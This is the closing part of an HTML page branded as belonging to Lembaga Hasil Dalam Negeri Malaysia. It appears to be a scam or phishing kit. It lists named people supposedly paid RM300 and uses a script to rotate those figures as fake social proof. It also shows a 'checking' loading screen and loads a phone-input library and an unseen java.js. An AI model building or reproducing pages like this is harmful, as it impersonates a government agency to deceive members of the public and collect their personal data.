                  <div class="h1"><span class="name">Azhar Abdullah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Hasnah Abdul</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rahim Salleh</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Nadia Hafiz</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Fariz Musa</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rina Zainal</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Amir Rahman</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Norshila Anuar</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Zainuddin Ali</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Fauzi Abdul Rahman</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Lina Mohd Noor</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Ismail Zaid</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <!-- footer -->
    <div class="footer">
      <p style="font-size: 10px; margin-top: 0; color: #fff !important">
        Hakcipta Terpelihara 2024 &copy; Lembaga Hasil Dalam Negeri Malaysia
      </p>
      <div class="footer-icon">
        <i data-feather="instagram"></i>
        <i data-feather="facebook"></i>
        <i data-feather="linkedin"></i>
        <i data-feather="youtube"></i>
      </div>
    </div>

    <div class="loading-screen" id="loadingScreen">
      <img src="loading-loading-forever.gif" alt="Loading..." />
      <br />
      <p style="color: var(--primary-blue); margin-top: 10px; font-size: 14px">
        Tunggu kami sedang menyemak...
      </p>
    </div>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.8/js/intlTelInput.min.js"></script>

    <script>
      document.querySelectorAll(".h2").forEach((item, index) => {
        const amounts = ["RM100", "RM200", "RM350"];
        const randomAmount = amounts[index % 3]; // Akan bergantian antara ketiga nilai
        item.textContent = item.textContent.replace("RM300", randomAmount);
      });
    </script>

    <script src="java.js"></script>

    <!-- feather icons -->
    <script>
      feather.replace();
    </script>
  </body>
</html>
